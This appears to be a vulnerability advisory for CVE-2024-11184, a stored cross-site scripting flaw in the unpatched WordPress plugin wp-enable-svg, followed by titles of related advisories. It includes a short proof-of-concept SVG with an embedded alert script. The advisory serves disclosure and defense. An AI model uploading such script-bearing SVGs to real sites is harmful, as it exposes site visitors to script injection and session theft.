WP Enabled SVG <= 0.2 – Author+ Stored XSS via SVG | CVE 2024-11184

Description

The plugin does not sanitize SVG files when uploaded, allowing for authors and above to upload SVGs containing malicious scripts

Proof of Concept

An author can upload a SVG file containing this:

<svg xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">
      alert('xss');
   </script>
</svg>

If someone browses to the URL of uploaded SVG file, the malicious JS is executed.

Affects Plugins

wp-enable-svg

No known fix

References

CVE

CVE-2024-11184

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

4.8 (medium)

Miscellaneous

Original Researcher

Pierre Rudloff

Submitter

Pierre Rudloff

Verified

Yes

WPVDB ID

fc982bcb-9974-481f-aef4-580ae9edc3c8

Timeline

Publicly Published

2024-12-11 (about 1 year ago)

Added

2024-12-11 (about 1 year ago)

Last Updated

2025-01-30 (about 11 months ago)

Other

Published

Title

Published

2022-09-12

Title

Add Shortcodes Actions And Filters <= 2.10 - Admin+ Stored XSS

Published

2018-05-28

Title

Site Reviews <= 2.15.2 - Cross-Site Scripting (XSS)

Published

2025-01-16

Title

Easy Tweet Embed <= 1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2022-03-21

Title

Export All URLs < 4.2 - Reflected Cross-Site Scripting

Published

2024-05-28

Title

FooBox (Free and Premium) < 2.7.28 - Admin+ Stored XSS